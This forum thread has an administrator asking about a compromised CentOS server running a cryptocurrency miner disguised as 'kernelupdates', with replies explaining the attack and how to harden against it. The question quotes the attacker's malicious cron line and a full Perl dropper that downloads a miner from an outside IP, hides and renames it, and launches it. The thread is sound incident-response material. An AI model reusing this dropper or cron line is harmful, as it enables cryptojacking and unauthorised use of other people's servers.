./kernelupdates 100% cpu usage

I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below.

./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx

But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries.

But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs.

  1. Does this process belong to a mining process?
  2. How can we stop cronjob modification and clean the source of this process?

Cron entry (apache user)

/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*

abc.txt

#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) {
$rn=int(rand(11));
}
$exists=`ls /tmp/.ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelupdates/gi) { die; }
if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig>6)) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
} else {
system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
}
}
}

@prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";
system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
print "done!\n";

This process is a Litecoin(an alternative cryptocurrency) miner process. Someone with access to your server is using your server to generate Litecoins( = make money). The kernelupdates name is very likely just to confuse you.

Before you remove anything I would recommend to make a backup of everything you have and find out, how this was put into your server. If you remove it but don't remove the security issue it is very likely to come back. I would bet on Wordpress or some outdated plugin beeing the security hole.

After finding and of course fixing the security issue, try to look your cron logs in the syslog. This might give you an indication how the cronjob is inserted.


I was just compromised by this on my server. I can see in my logs that I was being hit on an old wordpress site, and then seconds later they had the cron jobs running over and over. Interesting that I've had this site for quite some time now, and it only happened when I changed over to nginx and php-fpm, is your setup the same?

I'm hoping that all that happened is that they were able to install these cron jobs through a vulnerability in php/wordpress basically they:

  • Got shell access and execute crontab -e to get the cron jobs firing
  • The cron job puts the script in /tmp/abc.txt.1 and executes it
  • The script downloads the litecoin miner in /etc/.ice-unix renames it kernelupdates and starts it
  • They ensure that the miner stays put from there by firing that cron job over and over

Also note that the litecoin username is slightly variable between spdrman.2 and spdrman.10.

One thing, please check your /etc/passwd for your apache user. I had my shell stupidly set to /bin/bash this is probably safer to be set as /bin/false

Also if possible ensure that your apache user cannot execute commands like crontab, wget, or curl to stop this from happening again. Those commands seem to be at the core of what they did when they got in.

As a precaution I'm changing my ssh port again, I've double checked and I've set PermitRootLogin no in sshd settings so I'm pretty sure they couldn't have gotten in directly as root